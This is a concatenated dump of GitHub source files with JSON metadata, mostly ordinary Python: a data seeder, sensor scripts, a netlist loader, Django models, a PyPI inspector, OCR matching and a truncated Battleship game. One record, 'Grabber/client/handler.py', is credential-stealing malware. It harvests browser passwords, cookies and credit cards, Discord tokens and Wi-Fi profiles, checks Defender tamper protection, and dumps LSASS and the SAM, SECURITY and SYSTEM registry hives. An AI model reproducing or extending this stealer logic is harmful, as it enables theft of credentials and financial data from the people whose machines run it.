self._image_shape)\n frames.append(frame)\n print(len(frames))\n\n def _can_add_frame(self, count: int):\n return count % self._count_size == 0\n\n def _can_predict(self, frames: list):\n return len(frames) == self._seq_size\n\n\ndef main():\n demo = Demo()\n with demo:\n # demo.execute()\n demo.save_picture()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ujhrkzy/iris","sub_path":"iris/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70383084168","text":"from app.models import db, Anime\nimport requests\n\n\ndef retrieve_data(url):\n headers = {\n \"Accept\": \"application/vnd.api+json\",\n \"Content-Type\": \"application/vnd.api+json\"\n }\n list_of_anime = requests.get(url, headers=headers)\n return list_of_anime.json()\n\n\ndef seed_animes():\n anime = []\n url = 'https://kitsu.io/api/edge/anime?sort=popularityRank'\n count = 0\n while count < 10:\n response = retrieve_data(url)\n anime.extend(response[\"data\"])\n url = response[\"links\"][\"next\"]\n count += 1\n\n for i in anime:\n print(i[\"id\"])\n anime_series = Anime(\n title=i[\"attributes\"][\"canonicalTitle\"],\n image=i[\"attributes\"][\"posterImage\"][\"small\"],\n release_date=i[\"attributes\"][\"startDate\"],\n trailer_url=\"http://www.youtube.com/watch?v=\" +\n i[\"attributes\"][\"youtubeVideoId\"],\n description=i[\"attributes\"][\"synopsis\"],\n )\n db.session.add(anime_series)\n db.session.commit()\n\n\ndef undo_animes():\n db.session.execute('TRUNCATE animes restart identity CASCADE;')\n db.session.commit()\n","repo_name":"cabarnes2020/anime-tion","sub_path":"app/seeds/animes.py","file_name":"animes.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"28723946531","text":"import RPi.GPIO as GPIO\nimport time\n\n# 거리가 가까워지면 모터가 빠르게 돌음\n\ndef detect_distance():\n GPIO.output(ultra_trig, False)\n time.sleep(0.5)\n\n GPIO.output(ultra_trig, True)\n time.sleep(0.00001)\n GPIO.output(ultra_trig, False)\n\n while GPIO.input(ultra_echo) == 0:\n pulse_start = time.time()\n while GPIO.input(ultra_echo) == 1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n dist = pulse_duration * 17000\n return round(dist, 2)\n\n\nGPIO.setmode(GPIO.BCM)\n\n# ultrasonic sensor\nultra_trig = 18\nultra_echo = 21\n\nGPIO.setup(ultra_trig, GPIO.OUT)\nGPIO.setup(ultra_echo, GPIO.IN)\n\n# dcmotor\ndcmotor = 13\nGPIO.setup(dcmotor, GPIO.OUT)\nPWM_dcmotor = GPIO.PWM(dcmotor, 50)\n\nPWM_dcmotor.start(0)\nPWM_dcmotor.ChangeDutyCycle(0)\n\n# 변수 선언\ndistance = 0\n\ntry:\n while True:\n distance = detect_distance()\n\n if (distance <= 30):\n PWM_dcmotor.ChangeDutyCycle((30 - distance) / 1.5)\n else:\n PWM_dcmotor.ChangeDutyCycle(0)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n\n\n","repo_name":"min02choi/Sensor-Programming","sub_path":"sensor_study/dcmotor_test.py","file_name":"dcmotor_test.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33502855363","text":"\"\"\" write a Component from the YAML netlist\n\nDeprecated! use pp/component_from_yaml instead!\n\n.. code::\n\n top_arm\n -CP1= =CP2-\n bot_arm\n\"\"\"\n\nfrom typing import Union, IO, Any\nimport pathlib\nimport io\nfrom omegaconf import OmegaConf\n\nfrom pp.component import Component\nfrom pp.components import component_type2factory as component_type2factory_default\nfrom pp.netlist_to_gds import netlist_to_component\n\n\nsample = \"\"\"\n\ninstances:\n CP1:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 10\n CP2:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 5\n transformations: mirror_y\n arm_top:\n component: mzi_arm\n settings:\n L0: 10\n DL: 0\n arm_bot:\n component: mzi_arm\n settings:\n L0: 100\n DL: 0\n transformations: mirror_x\n\nconnections:\n - [CP1, E0, arm_bot, W0]\n - [arm_bot, E0, CP2, E0]\n - [CP1, E1, arm_top, W0]\n - [arm_top, E0, CP2, E0]\n\nports_map:\n W0: [CP1, W0]\n E0: [CP2, W0]\n E_TOP_0: [arm_top, E_0]\n E_TOP_1: [arm_top, E_1]\n E_TOP_2: [arm_top, E_2]\n E_TOP_3: [arm_top, E_3]\n E_BOT_0: [arm_bot, E_0]\n E_BOT_1: [arm_bot, E_1]\n E_BOT_2: [arm_bot, E_2]\n E_BOT_3: [arm_bot, E_3]\n\n\"\"\"\n\n\ndef netlist_from_yaml(\n yaml: Union[str, pathlib.Path, IO[Any]], component_type2factory=None,\n) -> Component:\n \"\"\" Loads Component settings from YAML file, and connections\n\n Deprecated! use component_from_yaml instead\n\n Args:\n netlist: YAML IO describing instances, connections and ports_map\n\n Returns:\n Component\n\n .. code-block:: yaml\n\n instances:\n CP1:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 10\n CP2:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 5\n transformations: mirror_y\n arm_top:\n component: mzi_arm\n settings:\n L0: 10\n DL: 0\n arm_bot:\n component: mzi_arm\n settings:\n L0: 100\n DL: 0\n transformations: mirror_x\n\n ports_map:\n W0: [CP1, W0]\n E0: [CP2, W0]\n E_TOP_0: [arm_top, E_0]\n E_TOP_1: [arm_top, E_1]\n E_TOP_2: [arm_top, E_2]\n E_TOP_3: [arm_top, E_3]\n E_BOT_0: [arm_bot, E_0]\n E_BOT_1: [arm_bot, E_1]\n E_BOT_2: [arm_bot, E_2]\n E_BOT_3: [arm_bot, E_3]\n\n connections:\n - [CP1, E0, arm_bot, W0]\n - [arm_bot, E0, CP2, E0]\n - [CP1, E1, arm_top, W0]\n - [arm_top, E0, CP2, E0]\n\n \"\"\"\n\n yaml = io.StringIO(yaml) if isinstance(yaml, str) and \"\\n\" in yaml else yaml\n conf = OmegaConf.load(yaml)\n component_type2factory = component_type2factory or component_type2factory_default\n\n instances = {}\n for instance_name in conf.instances:\n instance_conf = conf.instances[instance_name]\n component_type = instance_conf[\"component\"]\n component_settings = instance_conf[\"settings\"] or {}\n instance = component_type2factory[component_type](**component_settings)\n instance_transformations = instance_conf[\"transformations\"] or \"None\"\n instance_properties = instance_conf[\"properties\"] or {}\n for k, v in instance_properties.items():\n setattr(instance, k, v)\n instance.name = instance_name\n instances[instance_name] = (instance, instance_transformations)\n\n connections = conf.connections\n ports_map = conf.ports_map\n return netlist_to_component(instances, connections, ports_map)\n\n\ndef test_netlist_from_yaml():\n c = netlist_from_yaml(sample)\n assert len(c.get_dependencies()) == 4\n return c\n\n\nif __name__ == \"__main__\":\n import pp\n\n # c = test_netlist_from_yaml()\n c = netlist_from_yaml(sample)\n pp.show(c)\n","repo_name":"PsiQ/gdsfactory","sub_path":"pp/netlist_from_yaml.py","file_name":"netlist_from_yaml.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"16"} +{"seq_id":"30791752128","text":"#!/usr/bin/env python3\n\n\nw, h, n = list(map(int, input().split()))\n\nleft = 0\nright = n * max(w, h)\n\nwhile right > left + 1:\n m = (right + left) // 2\n if (m // w) * (m // h) >= n:\n right = m\n else:\n left = m\n\nprint(right)\n","repo_name":"Bytamine/ff-olymp","sub_path":"22 binary search/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1281147471","text":"import imaplib\nimaplib._MAXLINE = 40000\nimport email\nfrom icalendar import Calendar, Event\nimport json\n\nclient_secrets = {}\nwith open(\"client_secrets.json\") as f:\n\tclient_secrets = json.load(f)\n\nmail = imaplib.IMAP4_SSL(client_secrets.imap_server)\nmail.login(client_secrets.login, client_secrets.password)\n# mail.list()\n# Out: list of \"folders\" aka labels in gmail.\nmail.select(\"calendar\") # connect to inbox.\n\n# Initialize a calendar to hold the merged data\nmerged_calendar = Calendar()\nmerged_calendar.add('prodid', '-//exchange//ecsorl.com//')\nmerged_calendar.add('calscale', 'GREGORIAN')\n\nimport datetime\ndate = (datetime.date.today() - datetime.timedelta(1)).strftime(\"%d-%b-%Y\")\nresult, uids = mail.uid('search', None, '(SENTSINCE {date})'.format(date=date))\ntry:\n\tfor uid in uids[0].split():\n\t\tresult, data = mail.uid('fetch', uid, '(RFC822)')\n\t\traw_email = data[0][1]\n\t\n\t\tmsg = email.message_from_string(raw_email)\n\t\t# print( msg['To'] )\n\t\t# print( email.utils.parseaddr(msg['From']) )\n\t\t# print( email_message.items() )\n\t\tfor part in msg.walk():\n\t\t\tif part.get_content_type() == 'text/calendar':\n\t\t\t\tics_text = part.get_payload(decode=1)\n\t\t\t\timporting = Calendar.from_ical(ics_text)\n\t\t\t\tfor event in importing.subcomponents:\n\t\t\t\t\tprint(event.name)\n\t\t\t\t\tif event.name != 'VEVENT':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tmerged_calendar.add_component(event)\nfinally:\n\t# Disconnect from the IMAP server\n\tif mail.state != 'AUTH':\n\t\tmail.close()\n\tmail.logout()\n\noutput = open( 'test.ics', 'wt')\ntry:\n\toutput.write(merged_calendar.to_ical()) #.decode('utf-8'))\nfinally:\n\toutput.close()\n","repo_name":"howchmo/exch03cal","sub_path":"exch03imap2ics.py","file_name":"exch03imap2ics.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24073686942","text":"from django.db import models\nfrom datetime import datetime\n\nclass Upload_list_opv2(models.Model):\n descricao = models.CharField(max_length=200, blank=False, null=False)\n arquivo = models.FileField(max_length=200, upload_to='static/arquivosxls/', blank=False, null=False)\n\n def __str__(self):\n return self.descricao\n\nclass Opsv2(models.Model):\n orcamento = models.IntegerField(blank=False, null=False)\n cliente = models.CharField(max_length=300, blank=False, null=False)\n servico = models.TextField(blank=False, null=False)\n quant = models.DecimalField(max_digits=7, decimal_places=0, blank=False, null=False)\n valor = models.DecimalField(max_digits=7, decimal_places=2, blank=False, null=False)\n entrada = models.DateField(blank=False, null=False)\n vendedor = models.CharField(max_length=100, blank=False, null=False)\n op = models.IntegerField(blank=False, null=False)\n prev_entrega = models.DateTimeField(blank=False, null=False)\n\n def status(self):\n stat = {}\n now = str(datetime.now())\n ent = str(self.prev_entrega)\n sepe = ent.split(' ')\n sepn = now.split(' ')\n dpe = datetime.strptime(sepe[0], '%Y-%m-%d').date()\n dpn = datetime.strptime(sepn[0], '%Y-%m-%d').date()\n diasp = str(dpe - dpn)\n diasat = str(dpn - dpe)\n sdias = diasp.split(' ')\n sdiasat = diasat.split(' ')\n if sdias[0] == '0:00:00':\n stat['diasp'] = 0\n else:\n stat['diasp'] = int(sdias[0])\n\n if sepe[0] < sepn[0]:\n stat['posicao'] = 'Atrasado a ' + str(sdiasat[0]) + ' dia(s)'\n elif sepe[0] == sepn[0]:\n stat['posicao'] = 'Entrega Hoje'\n elif diasp[0] <= '1':\n stat['posicao'] = 'Entrega Amanhã'\n else:\n stat['posicao'] = 'Entrega em ' + str(sdias[0]) + ' dias'\n\n return stat\n\n def __str__(self):\n return str(self.op) + ' - ' + self.cliente\n\n\nclass Reg_entregav2(models.Model):\n op = models.OneToOneField(Opsv2, on_delete=models.PROTECT, blank=False, null=False)\n produzido = models.DateField(blank=True, null=True)\n obs = models.CharField(max_length=50, blank=True, null=True)\n entrega = models.DateField(blank=True, null=True)\n cancelada = models.BooleanField(default=False)\n\n def statusent(self):\n statent = {}\n now = str(datetime.now())\n prod = str(self.produzido)\n sepe = prod.split(' ')\n sepn = now.split(' ')\n dpe = datetime.strptime(sepe[0], '%Y-%m-%d').date()\n dpn = datetime.strptime(sepn[0], '%Y-%m-%d').date()\n diasp = str(dpe - dpn)\n diasat = str(dpn - dpe)\n sdias = diasp.split(' ')\n sdiasat = diasat.split(' ')\n if sdias[0] == '0:00:00':\n statent['diasat'] = 0\n else:\n statent['diasat'] = int(sdiasat[0])\n\n\n if sepe[0] < sepn[0]:\n statent['posicao'] = 'Em expedição a ' + str(sdiasat[0]) + ' dias'\n elif sepe[0] == sepn[0]:\n statent['posicao'] = 'Entrou em expedição Hoje'\n\n return statent\n\n def __str__(self):\n\n if self.cancelada == True:\n return str(self.op) + ' - ' + str(self.entrega) + ' - Cancelada'\n\n return str(self.op) + ' - ' + str(self.produzido)\n","repo_name":"pwlimaverde/appecoprint","sub_path":"modulopcp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9446518825","text":"import math\n\nT = int(input())\n\nfor i in range(T):\n x, y = map(int, input().split())\n \n if y - x <= 3:\n print(y-x)\n else:\n N = int(math.sqrt(y-x))\n\n if N ** 2 == y - x :\n print(2*N-1)\n elif N ** 2 < y-x <= N ** 2 + N :\n print(2*N)\n else :\n print(2*N+1)","repo_name":"gistarrr/Coding_Test","sub_path":"BOJ/Basic_Math1/BOJ_1101.py","file_name":"BOJ_1101.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42555323965","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom django import template\nfrom adm.models import Adm, Material\nimport random\n\nregister = template.Library()\n\n@register.simple_tag\ndef show_ad(slug):\n ads = Material.objects.select_related().filter(adm__slug = slug, post = True)\n ads_full = []\n for ad in ads:\n ads_full.extend([ad for i in range(ad.weight)])\n if ads_full:\n\t ad = random.choice(ads_full)\n\t return '''\"%s\"'''%(ad.title, ad.link, slug, ad.title, ad.imagefile.url, ad.title)\n else:\n return ''","repo_name":"plutokamin/pujia8","sub_path":"adm/templatetags/adm_tags.py","file_name":"adm_tags.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27790139838","text":"def n_m_1(seq):\r\n if len(seq) == m:\r\n print(*seq)\r\n return\r\n \r\n for i in range(n):\r\n if not i+1 in seq:\r\n n_m_1(seq + [i+1])\r\n \r\n\r\n \r\nn, m = map(int, input().split())\r\nn_m_1([])","repo_name":"iamdudumon/CodingTest","sub_path":"백준/Silver/15649. N과 M (1)/N과 M (1).py","file_name":"N과 M (1).py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22522700195","text":"from rp import *\n\n\n#This code is all sloppy; written in a few hours. Didn't debug. But it seems to work well...soo...its good 'nuff for me.\ndef get_name(metadata):\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n lines=line_split(metadata)\n lines=[x for x in lines if x.startswith('Name:')]\n return lines\ndef get_site_packages_directory():\n import sysconfig\n out= sysconfig.get_paths()[\"purelib\"]\n if folder_exists(out):\n return out\n # if not folder_exists(out):\n # for _ in sys.path:\n # if get_file_name(_)=='site-packages':\n # return _\n import rp\n return get_parent_directory(get_parent_directory(get_module_path(rp)))#Should look like /home/ryan/.local/lib/python3.8/site-packages/rp/__init__.py then /home/ryan/.local/lib/python3.8/site-packages\n \ndef process(dist_info):\n assert folder_exists(dist_info)\n files=get_all_paths(dist_info,include_files=True,include_folders=False)\n file_names=[get_file_name(file) for file in files]\n assert 'METADATA' in file_names\n assert 'top_level.txt' in file_names\n modules=get_modules(dist_info)\n name=get_pypi_name(dist_info)\n info=get_pypi_info(dist_info)\n return info,modules\ndef get_pypi_name(dist_info_path):\n metadata=path_join(dist_info_path,'METADATA')\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n else:\n raise FileNotFoundError(metadata)\n lines=line_split(metadata)\n lines=[x for x in lines if x.startswith('Name:')]\n assert len(lines)==1\n line=lines[0]\n name=line[len('Name:'):].strip()\n return name\ndef get_modules(dist_info_path):\n top_level=path_join(dist_info_path,'top_level.txt')\n top_level=text_file_to_string(top_level)\n top_level=line_split(top_level)\n return top_level\ndef get_dist_info_paths(): \n infos=[x for x in get_subdirectories(get_site_packages_directory()) if x.endswith('.dist-info')]\n return infos\ndef get_dist_infos():\n output=[]\n for path in get_dist_info_paths():\n try:\n processed=process(path)\n # fansi_print(processed[0],'cyan')\n output.append(processed)\n except Exception:\n pass\n out={}\n for o in output:\n for module in o[1]:\n out[module]=o[0]\n return out\n\ndef get_pypi_info(dist_info_path):\n\n output={}\n output['dist-info']=dist_info_path\n\n\n try:\n #EXAMPLE METADATA:\n # Version: 1.7.0\n # Name: torch\n # Home-page: https://pytorch.org/\n # Summary: Tensors and Dynamic neural networks in Python with strong GPU acceleration\n # Keywords: pytorch machine learning\n # Requires-Python: >=3.6.1\n # Author-email: packages@pytorch.org\n # Requires-Dist: future\n # Requires-Dist: numpy\n # Requires-Dist: dataclasses\n metadata=path_join(dist_info_path,'METADATA')\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n else:\n raise FileNotFoundError(metadata)\n lines=line_split(metadata)\n def get_field(prefix):\n return [x[len(prefix):].strip() for x in lines if x.startswith(prefix)]\n for prefix in 'Name Version Home-page Summary Keywords Requires-Python Author-email Requires-Dist'.split():\n fields=get_field(prefix+':')\n if len(fields)==0:\n continue\n if len(fields)==1:\n output[prefix]=fields[0]\n else:\n output[prefix]=fields\n \n if 'Requires-Dist' in output:\n #Turn stuff like \"prompt-toolkit ; extra == 'ptk'\", into \"prompt-toolkit\"\n if isinstance(output['Requires-Dist'],list):\n output['Requires-Dist']=sorted(set([x.split()[0] for x in output['Requires-Dist']]))\n elif isinstance(output['Requires-Dist'],str):\n output['Requires-Dist']=[output['Requires-Dist'].split()[0]]#i changed my mind keep it as a list\n\n for from_name,to_name in [('Requires-Dist','Dependencies'),('Home-page','Homepage'),('Author-email',\"Author Email\"),('Requires-Python','Requires Python')]:\n if from_name in output:\n output[to_name]=output[from_name]\n del output[from_name]\n \n except Exception as e:\n #if 'cv' in output['Package Name']:\n print_verbose_stack_trace(e)\n \n\n try:\n entry_points=path_join(dist_info_path,'entry_points.txt')\n #entry_points=text_file_to_string(entry_points)\n #entry_points=entry_points.splitlines()\n #entry_points=[x.strip() for x in entry_points]\n #entry_points=[x for x in entry_points if x]\n scripts=get_console_scripts(entry_points)\n #if len(scripts)==1:\n #scripts=scripts[0]\n #output['Console Script']=scripts\n if scripts:\n output['Console Scripts']=scripts\n except Exception:pass\n\n try:\n output['Modules']=get_modules(dist_info_path)\n except Exception:pass\n return output\ndef get_console_scripts(entry_points):\n if path_exists(entry_points):\n entry_points=text_file_to_string(entry_points)\n entry_points=line_split(entry_points)\n output=[]\n flag=False\n for line in entry_points:\n line=line.strip()\n if line=='[console_scripts]':\n flag=True\n continue\n elif line.startswith('[') and line.endswith(']'):\n break\n if flag:\n if line:\n output.append(line)\n output=[x.split('=')[0].strip() for x in output]#Turn ['yapf = yapf:run_main'] into ['yapf']\n output=set(output)\n output=sorted(output)\n \n #ic(output)\n return output\n\ndef get_pypi_info_from_module(module):\n assert is_a_module(module)\n name=module.__name__\n name=name.split('.')[0]#rp.prompt_toolkit --> rp\n info=get_dist_infos()\n if name in info:\n return info[name]\n return None\n\ndef display_module_pypi_info(object,info=None):\n #assert is_a_module(module)\n #module_name=module.__name__\n module_name=get_module_name_from_object(object)\n fansi_print('PyPI package info for module '+module_name+':','blue','bold')\n info=info or get_pypi_info_from_module_name(module_name)\n indent=' '\n if info is None:\n fansi_print('Failed to find any package information for '+module_name+'. Maybe it didnt come from PyPI?','red','bold')\n else:\n for field in sorted(info):\n fansi_print(indent+field+': ','green','bold',new_line=False)\n data=info[field]\n if isinstance(data,list) and len(data)==1:\n data=data[0]\n if isinstance(data,list) and not data:\n continue\n if isinstance(data,str):\n print(data)\n else:\n print()\n print(indentify(line_join(data),indent=2*indent))\n\ndef display_all_pypi_info():\n iinfo=get_dist_infos()\n for name in sorted(iinfo):\n info=get_pypi_info_from_module_name(name,iinfo)\n display_module_pypi_info(name,info)\n print()\n\n \ndef get_module_from_object(o):\n if isinstance(o,str):\n pass\n\ndef get_module_name_from_object(o):\n if isinstance(o,str):\n return o\n if is_a_module(o):\n return o.__name__\n import inspect\n module=inspect.getmodule(o)\n if module is None:\n module=inspect.getmodule(type(o))\n # if is_a_module(module):\n # return module.__name__\n try:\n return module.__name__\n except Exception:\n pass\n raise TypeError('Failed to get the module name for the given object')\n\ndef get_pypi_info_from_module_name(module_name,info=None):\n #assert is_a_module(module)\n name=module_name\n name=name.split('.')[0]#rp.prompt_toolkit --> rp\n info=info or get_dist_infos()\n if name in info:\n return info[name]\n return None\n\ndef get_pypi_module_package_names():\n import rp.pypi_inspection as p\n o=p.get_dist_infos()\n q={}\n for x in o:\n q[x]=o[x]['Name']\n q.update(r.known_pypi_module_package_names)\n q={x:y for x,y in q.items() if x}\n q={x:y for x,y in q.items() if x!=y}\n t={}\n for x in sorted(q):\n t[x]=q[x]\n return t\n","repo_name":"RyannDaGreat/rp","sub_path":"pypi_inspection.py","file_name":"pypi_inspection.py","file_ext":"py","file_size_in_byte":8345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"40753298443","text":"from typing import Dict, List\nfrom ...template.tp_node_item import TpNodeItem\nfrom ...utils import str_util\nfrom ocr_structuring.utils.logging import logger\nfrom ...utils.node_item_group import NodeItemGroup\nfrom .tp_conf_base_item import TpConfBaseItem\n\nBG_MATCH_MODE_COMMON = \"common\"\nBG_MATCH_MODE_HORIZONTAL_SPLIT = \"h_split\"\nBG_MATCH_MODE_HORIZONTAL_MERGE = \"h_merge\"\nBG_MATCH_MODE_VERTICAL_MERGE = \"v_merge\"\n\n\nclass TpConfBgItem(TpConfBaseItem):\n def __init__(self, item_conf, is_tp_conf: bool = False):\n super().__init__(item_conf, is_tp_conf)\n self.content = self.contents[0]\n self.mode = item_conf.get(\"mode\", BG_MATCH_MODE_COMMON)\n self.match_func = {\n BG_MATCH_MODE_COMMON: self._norm_match,\n BG_MATCH_MODE_HORIZONTAL_MERGE: self._horizontal_merge_match,\n BG_MATCH_MODE_HORIZONTAL_SPLIT: self._horizontal_split_match,\n }\n assert self.mode in self.match_func.keys(), \"current mode is {}\".format(\n self.mode\n )\n\n def _norm_match(self, node_items: Dict[str, TpNodeItem]) -> List[TpNodeItem]:\n out = []\n for node_item in node_items.values():\n if self.check_content_similar(\n node_item.text, remove_space=True, remove_symbols=True\n ):\n out.append(node_item)\n\n return out\n\n def _horizontal_split_match(\n self, node_items: Dict[str, TpNodeItem]\n ) -> List[TpNodeItem]:\n norm_match_res = self._norm_match(node_items)\n if len(norm_match_res) != 0:\n return norm_match_res\n\n # 如果是有编辑距离的设置,则只使用 text 的内容进行 split\n if type(self.content) != str:\n bg_content = self.content[\"text\"]\n else:\n bg_content = self.content\n\n out = []\n for it in node_items.values():\n sub_str_start_idxes = str_util.findall_sub_str_idx(\n sub_text=bg_content, text=it.text\n )\n\n if len(sub_str_start_idxes) != 1:\n continue\n\n start_idx = sub_str_start_idxes[0]\n end_idx = sub_str_start_idxes[0] + len(bg_content)\n\n if end_idx > start_idx:\n new_node = it.split(start_idx, end_idx)\n if new_node:\n out.append(TpNodeItem(new_node.gen_ltrb_raw_node()))\n\n return out\n\n def _horizontal_merge_match(\n self, node_items: Dict[str, TpNodeItem]\n ) -> List[TpNodeItem]:\n norm_match_res = self._norm_match(node_items)\n if len(norm_match_res) != 0:\n return norm_match_res\n\n # 如果是有编辑距离的设置,则只使用 text 的内容进行 merge\n if not isinstance(self.content, str):\n bg_content = self.content[\"text\"]\n else:\n bg_content = self.content\n\n candidate_node_items = {}\n candidate_chars_count = 0\n\n for node_item in node_items.values():\n if node_item.cn_text in bg_content:\n candidate_node_items[node_item.uid] = node_item\n candidate_chars_count += len(node_item.cn_text)\n\n # 候选的节点的总长度小于背景的 content 长度,直接返回\n if candidate_chars_count < len(bg_content):\n return []\n\n line_groups = NodeItemGroup.find_row_lines(candidate_node_items)\n\n grouped_segs: List[List[NodeItemGroup]] = []\n for group in line_groups:\n segs = group.find_x_segs()\n grouped_segs.append(segs)\n\n out = []\n for segs in grouped_segs:\n for seg in segs:\n if seg.content() == bg_content:\n new_node = TpNodeItem(seg.gen_raw_node())\n out.append(new_node)\n logger.debug(f\"Merge mode bg item match success: {new_node}\")\n\n return out\n\n def match_node(self, node_items: Dict[str, TpNodeItem]) -> List[TpNodeItem]:\n matched_node_items = self.match_func[self.mode](node_items)\n return matched_node_items\n\n def __str__(self):\n return f\"{self.content} {self.bbox}\"\n","repo_name":"imfifc/myocr","sub_path":"ocr_structuring/core/template/matcher/tp_conf_bg_item.py","file_name":"tp_conf_bg_item.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42884515499","text":"from service.Paths import Paths\nfrom modules.Browser import getAutoFill, getCookies, getLoginData, getHistory, getCreditCards, getDownloads\nfrom modules.Discord import getToken\nfrom modules.FileManager import find_everyfile_extension\nfrom modules.Network import getInterfaces, getNetworkProfiles, getMoreInternet\nfrom modules.Windows import dumpLsass, isTamperProtected, dumpSamDatabase, dumpSecurityDatabase, dumpSystemDatabase, getComputerInformation\nfrom service.functions import find_computerName\n\n\ndef find_browsers_data():\n browsers = Paths.get(\"browser\")\n data = {}\n\n for browser in browsers:\n data[browser] = {}\n data[browser][\"Autofill\"] = getAutoFill(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"LoginData\"] = getLoginData(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Cookies\"] = getCookies(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"History\"] = getHistory(\n browser, Paths.get(\"browser\").get(browser))\n # data[browser][\"Bookmarks\"] = getBookmarks(\n # browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Downloads\"] = getDownloads(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Credit_Cards\"] = getCreditCards(\n browser, Paths.get(\"browser\").get(browser)\n )\n\n return data\n\n\ndef find_network_data():\n data = {}\n data[\"Interfaces\"] = getInterfaces()\n data[\"Profiles\"] = getNetworkProfiles()\n data[\"More\"] = getMoreInternet(10)\n return data\n\n\ndef find_discord_data():\n discords = Paths.get(\"discord\")\n data = {}\n\n for discord in discords:\n data[discord] = {}\n data[discord][\"token\"] = getToken(\n discord,\n Paths.get(\"discord\").get(discord))\n print(data)\n return data\n\n\ndef find_windows_data():\n windows_data = getComputerInformation()\n print(windows_data)\n return windows_data\n\n\ndef handle_windows():\n if isTamperProtected():\n return \"Tamper protection is enabled, please disable it and try again.\"\n else:\n # disableRealtimeDefender()\n # enableDebugPrivilege()\n dumpLsass(find_computerName() + \"lsass.dmp\")\n dumpSamDatabase(find_computerName() + \"sam\")\n dumpSecurityDatabase(find_computerName() + \"security\")\n dumpSystemDatabase(find_computerName() + \"system\")\n return \"OK\"\n","repo_name":"lukasolsen/CodeVault","sub_path":"Grabber/client/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32327774594","text":"import os\r\nimport time\r\n\r\n\r\nclass Player:\r\n def __init__(self):\r\n self.name = ''\r\n self.n, self.m = 10, 10\r\n self.hits = [[0 for _ in range(self.m)] for _ in range(self.n)]\r\n self.ships = [[0 for _ in range(self.m)] for _ in range(self.n)]\r\n self.storage = []\r\n\r\n def print_field(self, paint=True): # рисует поле. Если идет игра, то корабли не отображаются\r\n os.system('cls')\r\n print(' ', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\r\n for i in range(self.m):\r\n print(i, end=' ')\r\n for j in range(self.n):\r\n if self.ships[i][j] == 0: # Пусто\r\n print('.', end=' ')\r\n elif self.ships[i][j] == 1: # Корабль\r\n print('@', end=' ') if paint else print('.', end=' ')\r\n elif self.ships[i][j] == 2: # Мимо\r\n print('*', end=' ')\r\n elif self.ships[i][j] == 3: # Ранен\r\n print('x', end=' ')\r\n elif self.ships[i][j] == 4: # Убит\r\n print('@', end=' ')\r\n print()\r\n\r\n def check_ship(self, deck, s, c, orient=1): # Проверка, можно ли поместить корабль в данном месте\r\n if (orient == 2 and (s + deck - 1) >= self.n) or (orient == 1 and (c + deck -1) >= self.n):\r\n print('Не лезет!!!')\r\n return False\r\n if orient == 1:\r\n for i in range(s-1, s+2):\r\n for j in range(c-1, c + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and self.ships[i][j]:\r\n print('Касается другого корабля!')\r\n return False\r\n return True\r\n if orient == 2:\r\n for i in range(c-1, c+2):\r\n for j in range(s-1, s + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and self.ships[j][i]:\r\n print('Касается другого корабля!')\r\n return False\r\n return True\r\n\r\n def place_ship(self, deck, s, c, orient=1): # сохраняет корабль\r\n spisok = []\r\n if orient == 1:\r\n for _ in range(deck):\r\n self.ships[s][c] = 1\r\n spisok.append([s, c])\r\n c += 1\r\n if orient == 2:\r\n for _ in range(deck):\r\n self.ships[s][c] = 1\r\n spisok.append([s, c])\r\n s += 1\r\n self.storage.append(spisok)\r\n\r\n def input_coord(self): # ввод координат кораблей\r\n for i in [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]:\r\n check = False\r\n orient = 1\r\n while not check:\r\n orient = 